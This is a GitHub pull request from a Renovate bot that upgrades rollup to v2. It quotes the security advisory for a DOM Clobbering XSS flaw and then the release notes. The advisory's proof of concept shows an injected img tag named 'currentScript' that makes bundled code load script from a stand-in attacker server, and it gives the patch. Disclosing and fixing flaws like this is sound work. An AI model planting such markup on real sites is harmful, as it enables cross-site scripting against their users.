Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

chore(deps): update dependency rollup to v2 [security] #150

Open
wants to merge 1 commit into
base: master
Choose a base branch
from

Conversation

alma-renovate-bot[bot]
Copy link
Contributor

@alma-renovate-bot alma-renovate-bot bot commented Sep 30, 2024

This PR contains the following updates:

Package Type Update Change Age Confidence
rollup (source) devDependencies major ^1.32.1 -> ^2.0.0 age confidence

GitHub Vulnerability Alerts

CVE-2024-47068

Summary

We discovered a DOM Clobbering vulnerability in rollup when bundling scripts that use import.meta.url or with plugins that emit and reference asset files from code in cjs/umd/iife format. The DOM Clobbering gadget can lead to cross-site scripting (XSS) in web pages where scriptless attacker-controlled HTML elements (e.g., an img tag with an unsanitized name attribute) are present.

It's worth noting that we’ve identifed similar issues in other popular bundlers like Webpack (CVE-2024-43788), which might serve as a good reference.

Details

Backgrounds

DOM Clobbering is a type of code-reuse attack where the attacker first embeds a piece of non-script, seemingly benign HTML markups in the webpage (e.g. through a post or comment) and leverages the gadgets (pieces of js code) living in the existing javascript code to transform it into executable code. More for information about DOM Clobbering, here are some references:

[1] https://scnps.co/papers/sp23_domclob.pdf
[2] https://research.securitum.com/xss-in-amp4email-dom-clobbering/

Gadget found in rollup

We have identified a DOM Clobbering vulnerability in rollup bundled scripts, particularly when the scripts uses import.meta and set output in format of cjs/umd/iife. In such cases, rollup replaces meta property with the URL retrieved from document.currentScript.

https://github.com/rollup/rollup/blob/b86ffd776cfa906573d36c3f019316d02445d9ef/src/ast/nodes/MetaProperty.ts#L157-L162

https://github.com/rollup/rollup/blob/b86ffd776cfa906573d36c3f019316d02445d9ef/src/ast/nodes/MetaProperty.ts#L180-L185

However, this implementation is vulnerable to a DOM Clobbering attack. The document.currentScript lookup can be shadowed by an attacker via the browser's named DOM tree element access mechanism. This manipulation allows an attacker to replace the intended script element with a malicious HTML element. When this happens, the src attribute of the attacker-controlled element (e.g., an img tag ) is used as the URL for importing scripts, potentially leading to the dynamic loading of scripts from an attacker-controlled server.

PoC

Considering a website that contains the following main.js script, the devloper decides to use the rollup to bundle up the program: rollup main.js --format cjs --file bundle.js.

var s = document.createElement('script')
s.src = import.meta.url + 'extra.js'
document.head.append(s)

The output bundle.js is shown in the following code snippet.

'use strict';

var _documentCurrentScript = typeof document !== 'undefined' ? document.currentScript : null;
var s = document.createElement('script');
s.src = (typeof document === 'undefined' ? require('u' + 'rl').pathToFileURL(__filename).href : (_documentCurrentScript && False && _documentCurrentScript.src || new URL('bundle.js', document.baseURI).href)) + 'extra.js';
document.head.append(s);

Adding the rollup bundled script, bundle.js, as part of the web page source code, the page could load the extra.js file from the attacker's domain, attacker.controlled.server due to the introduced gadget during bundling. The attacker only needs to insert an img tag with the name attribute set to currentScript. This can be done through a website's feature that allows users to embed certain script-less HTML (e.g., markdown renderers, web email clients, forums) or via an HTML injection vulnerability in third-party JavaScript loaded on the page.

<!DOCTYPE html>
<html>
<head>
  <title>rollup Example</title>
  <!-- Attacker-controlled Script-less HTML Element starts--!>
  <img name="currentScript" src="https://attacker.controlled.server/"></img>
  <!-- Attacker-controlled Script-less HTML Element ends--!>
</head>
<script type="module" crossorigin src="bundle.js"></script>
<body>
</body>
</html>

Impact

This vulnerability can result in cross-site scripting (XSS) attacks on websites that include rollup-bundled files (configured with an output format of cjs, iife, or umd and use import.meta) and allow users to inject certain scriptless HTML tags without properly sanitizing the name or id attributes.

Patch

Patching the following two functions with type checking would be effective mitigations against DOM Clobbering attack.

const getRelativeUrlFromDocument = (relativePath: string, umd = false) =>
	getResolveUrl(
		`'${escapeId(relativePath)}', ${
			umd ? `typeof document === 'undefined' ? location.href : ` : ''
		}document.currentScript && document.currentScript.tagName.toUpperCase() === 'SCRIPT' && document.currentScript.src || document.baseURI`
	);
const getUrlFromDocument = (chunkId: string, umd = false) =>
	`${
		umd ? `typeof document === 'undefined' ? location.href : ` : ''
	}(${DOCUMENT_CURRENT_SCRIPT} && ${DOCUMENT_CURRENT_SCRIPT}.tagName.toUpperCase() === 'SCRIPT' &&${DOCUMENT_CURRENT_SCRIPT}.src || new URL('${escapeId(
		chunkId
	)}', document.baseURI).href)`;

Release Notes

rollup/rollup (rollup)

v2.79.2

Compare Source

2024-09-26

Bug Fixes
  • Fix a vulnerability in generated code that affects IIFE, UMD and CJS bundles when run in a browser context (#​5671)
Pull Requests

v2.79.1

Compare Source

2022-09-22

Bug Fixes
  • Avoid massive performance degradation when creating thousands of chunks (#​4643)
Pull Requests

v2.79.0

Compare Source

2022-08-31

Features
  • Add amd.forceJsExtensionForImports to enforce using .js extensions for relative AMD imports (#​4607)
Pull Requests

v2.78.1

Compare Source

2022-08-19

Bug Fixes
  • Avoid inferring "arguments" as name for a default export placeholder variable (#​4613)
Pull Requests

v2.78.0

Compare Source

2022-08-14

Features
  • Support writing plugin hooks as objects with a "handler" property (#​4600)
  • Allow changing execution order per plugin hook (#​4600)
  • Add flag to execute plugins in async parallel hooks sequentially (#​4600)
Pull Requests

v2.77.3

Compare Source

2022-08-11

Bug Fixes
  • Correctly resolve preserveModulesRoot in Vite (#​4591)
Pull Requests

v2.77.2

Compare Source

2022-07-27

Bug Fixes
  • Avoid a rendering failure when mixing outputs with inlined and non-inlined dynamic imports (#​4589)
Pull Requests

v2.77.1

Compare Source

2022-07-26

Bug Fixes
  • Ensure IIFE output generates a global variable when generating ES5 (#​4588)
Pull Requests

v2.77.0

Compare Source

2022-07-15

Features
  • Introduce maxParallelFileOps to limit both read and write operations, default to 20 and replaces maxParallelFileRead (#​4570)
Bug Fixes
  • Avoid including variables referenced from return statements that are never reached (#​4573)
Pull Requests

v2.76.0

Compare Source

2022-07-08

Features
  • Allow setting a sourcmapBaseUrl for absolute paths in sourcemaps (#​4527)
Bug Fixes
  • Support absolute CLI plugin paths on Windows (#​4533)
Pull Requests

v2.75.7

Compare Source

2022-06-20

Bug Fixes
  • Mark Array.prototype.group/groupToMap as side effect free. (#​4531)
Pull Requests

v2.75.6

Compare Source

2022-06-07

Bug Fixes
  • Properly deoptimize "this" when using member expressions with getters/setters in for loops and update expressions ( #​4522)
Pull Requests

v2.75.5

Compare Source

2022-06-01

Bug Fixes
  • Avoid crashes when using logical expressions for unused constructor arguments (#​4519)
  • Fix missing parameter defaults for calls from try statements and functions returned by functions (#​4520)
Pull Requests

v2.75.4

Compare Source

2022-05-31

Bug Fixes
  • Ensure parameter defaults are retained when a function is used as an object property (#​4516)
Pull Requests

v2.75.3

Compare Source

2022-05-29

Bug Fixes
  • Retain parameter defaults for functions that are defaults themselves (#​4515)
  • Track mutations for objects as default values (#​4515)
Pull Requests

v2.75.2

Compare Source

v2.75.1

Compare Source

2022-05-28

Pull Requests

v2.75.0

Compare Source

2022-05-27

Features
  • Re-implement default parameter tree-shaking for top-level functions (#​4510)
  • Do not consider calling string methods like .trim() on template literals a side effect (#​4511)
Pull Requests

v2.74.1

Compare Source

2022-05-19

Bug Fixes
  • Revert #​4498 until some issues are understood and resolved

v2.74.0

Compare Source

2022-05-19

Features
  • Remove unneeded default values for function parameters (#​4498)
Bug Fixes
  • Use a consistent mechanism to resolve the config file to avoid issues on Windows (#​4501)
  • Avoid an inaccurate warning about an event emitter leak for complicated builds (#​4502)
  • Ensure that reexporting values from other chunks via dynamic imports does not reference non-imported variables (#​4499)
Pull Requests

v2.73.0

Compare Source

2022-05-13

Features
  • Do not treat Object.defineProperty/ies as side effect when called on an unused object (#​4493)
  • Do not assume that assigning a property can create a getter with side effects (#​4493)
  • Do not treat string.prototype.replace(All) as side effect when used with two literals (#​4493)
Bug Fixes
  • Detect side effects when manually declaring getters on functions (#​4493)
Pull Requests

v2.72.1

Compare Source

2022-05-07

Bug Fixes
  • Improve tree-shaking of classes with super classes in certain scenarios (#​4489)
Pull Requests

v2.72.0

Compare Source

2022-05-05

Features
  • Add CLI hooks to run external commands at certain points in watch mode (#​4457)
Bug Fixes
  • Fix an issue that could accidentally treat relevant assignments as side effect free (#​4486)
Pull Requests

v2.71.1

Compare Source

2022-04-30

Bug Fixes
  • Allow importing loadConfigFile without extension (#​4483)
Pull Requests

v2.71.0

Compare Source

2022-04-30

v2.70.2

Compare Source

2022-04-15

Bug Fixes
  • Do not enforce undefined return values in TypeScript types (#​4463)
Pull Requests

v2.70.1

Compare Source

2022-03-14

Bug Fixes
  • Handle unfinished hook action errors as regular errors and avoid console logging (#​4434)
  • Allow access to "dist" folder in a Node 17 compatible way (#​4436)
Pull Requests

v2.70.0

Compare Source

2022-03-07

Features
  • Make the watchChange and closeWatcher hooks asynchronous and make Rollup wait for these hooks before continuing ( #​4427)
Bug Fixes
  • Do not abort watch mode for errors in watchChange but display them properly (#​4427)
Pull Requests

v2.69.2

Compare Source

2022-03-06

Bug Fixes
  • Mark Object.entries and Object.fromEntries as pure (#​4429)
  • Make sure new properties on Array.prototype and Object.prototype are not evaluated as "undefined" (#​4428)
Pull Requests

v2.69.1

Compare Source

2022-03-04

Bug Fixes
  • Approximate source position instead of ignoring it when using a low-resolution source map in a transform hook (#​4334)
Pull Requests

v2.69.0

Compare Source

2022-03-02

Features
  • Introduce new output.generatedCode.symbols to control the usage of Symbols in Rollup-generated code (#​4378)
  • soft-deprecate output.namespaceToStringTag in favor of output.generatedCode.symbols (#​4378)
Bug Fixes
  • Properly handle ./ and ../ as external dependencies (#​4419)
  • Make generated "Module" namespace toStringTag non-enumerable for correct Object.assign/spread behaviour (#​4378)
  • Add file name to error when top-level-await is used in disallowed formats (#​4421)
Pull Requests

v2.68.0

Compare Source

2022-02-22

Features
  • provide information about cached import resolutions in shouldTransformCachedModule (#​4414)
  • Add "types" field to Rollup's package exports (#​4416)
Pull Requests

v2.67.3

Compare Source

2022-02-18

Bug Fixes
  • Do not swallow other errors when unfinished hook actions are detected (#​4409)
  • Add additional information to output when there are unfinished hook actions (#​4409)
Pull Requests

v2.67.2

Compare Source

2022-02-10

Bug Fixes
  • Ensure consistent order between manual chunks to fix hashing issues (#​4397)
Pull Requests

v2.67.1

Compare Source

2022-02-07

Bug Fixes
  • Make chunk file and variable names more deterministic when emitting chunks (#​4386)
  • Improve default module resolver performance by using non-blocking IO (#​4386)
Pull Requests

v2.67.0

Compare Source

2022-02-02

Features
  • Improve side effect detection when using Array.prototype.groupBy/groupByToMap (#​4360)
  • Allow changing moduleSideEffects at any time during the build (#​4379)
  • Soft-deprecate ModuleInfo.hasModuleSideEffects in favour of ModuleInfo.moduleSideEffects (#​4379)
Bug Fixes
  • Do not include queries and hashes in generated file names when preserving modules (#​4374)
Pull Requests

v2.66.1

Compare Source

2022-01-25

Bug Fixes
  • Only warn for conflicting names in namespace reexports if it actually causes problems (#​4363)
  • Only allow explicit exports or reexports as synthetic namespaces and hide them from namespace reexports (#​4364)
Pull Requests

v2.66.0

Compare Source

2022-01-22

Features
  • Note if a module has a default export in ModuleInfo to allow writing better proxy modules (#​4356)
  • Add option to wait until all imported ids have been resolved when awaiting this.load (#​4358)
Pull Requests

v2.65.0

Compare Source

2022-01-21

Features
  • Add complete import resolution objects to ModuleInfo for use in this.load (#​4354)
Bug Fixes
  • Use correct context in plugin hooks with perf: true (#​4357)
Pull Requests

v2.64.0

Compare Source

2022-01-14

Features
  • Allow inspecting cached modules and forcing them to be transformed again via shouldTransformCachedModule (#​4320)
  • Do not wait for the config file to be parsed in watch mode if it is updated before that (#​4344)
Bug Fixes
  • Do not mutate objects returned as meta from the resolveId hook (#​4347)
Pull Requests

v2.63.0

Compare Source

2022-01-04

Features
  • Report a helpful error if rollup exits due to an empty event loop when using this.load (#​4320)
  • Allow directly mutating ModuleInfo.meta for modules and never replace this object (#​4328)
  • Detect additional side effect free array prototype methods (#​4332)
Bug Fixes
  • Do not watch if CLI watch options are specified but --watch is missing (#​4335)
Pull Requests

v2.62.0

Compare Source

2021-12-24

Features
  • Mark additional string prototype methods as side-effect-free and correct typings of existing ones (#​4299)
  • Mark additional array prototype methods as side-effect-free and correct typings of existing ones (#​4309)
  • Expose if a module is included after tree-shaking in its ModuleInfo (#​4305)
Bug Fixes
  • Fix how fsevents is included to improve watch mode on MacOS (#​4312)
Pull Requests

v2.61.1

Compare Source

2021-12-11

Bug Fixes
  • Only resolve this.load once the code of the module is available (#​4296)
Pull Requests

v2.61.0

Compare Source

2021-12-09

Features
  • Support ergonomic brand checks for private fields (#​4293)
Bug Fixes
  • Improve handling of directory creation on systems with restrictive open files limit (#​4288)
Pull Requests

v2.60.2

Compare Source

2021-11-30

Bug Fixes
  • Produce correct output when dynamic import paths contain quotes (#​4286)
Pull Requests

v2.60.1

Compare Source

2021-11-22

Bug Fixes
  • Make sure virtual files have proper file extensions when preserving modules (#​4270)
Pull Requests

v2.60.0

Compare Source

2021-11-11

Features
  • Add this.load context function to load, transform and parse modules without adding them to the graph (#​4234)
  • Sanitize non-url-safe characters in generated chunk names by default (#​4262)
  • Support ESM plugins via command line (#​4265)
Pull Requests

v2.59.0

Compare Source

2021-11-01

Features
  • Support static class initialization blocks (#​4249)
Bug Fixes
  • Fix an issue with the CommonJS plugin when module.exports has inherited properties (#​4256)
Pull Requests

v2.58.3

Compare Source

2021-10-25

Bug Fixes
  • Republish 2.58.1 with npm 6 as files were missing

v2.58.2

Compare Source

2021-10-25

Bug Fixes
  • Republish 2.58.1 as files were missing

v2.58.1

Compare Source

2021-10-25

Bug Fixes
  • Fix an issue with the CommonJS plugin when module.exports is falsy (#​4247)
Pull Requests

v2.58.0

Compare Source

2021-10-01

Features
  • Add a flag to more reliably identify entry points in the resolveId hook (#​4230)
Pull Requests

v2.57.0

Compare Source

2021-09-22

Features
  • Add generatedCode option to allow Rollup to use es2015 features for smaller output and more efficient helpers ( #​4215)
  • Improve AMD and SystemJS parsing performance

Configuration

📅 Schedule: Branch creation - "" (UTC), Automerge - At any time (no schedule defined).

🚦 Automerge: Enabled.

Rebasing: Whenever PR is behind base branch, or you tick the rebase/retry checkbox.

👻 Immortal: This PR will be recreated if closed unmerged. Get config help if that's undesired.


  • If you want to rebase/retry this PR, check this box

This PR has been generated by Renovate Bot.

Copy link

sonarcloud bot commented Oct 14, 2024

Copy link

sonarcloud bot commented Nov 25, 2024

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
None yet
Development

Successfully merging this pull request may close these issues.

0 participants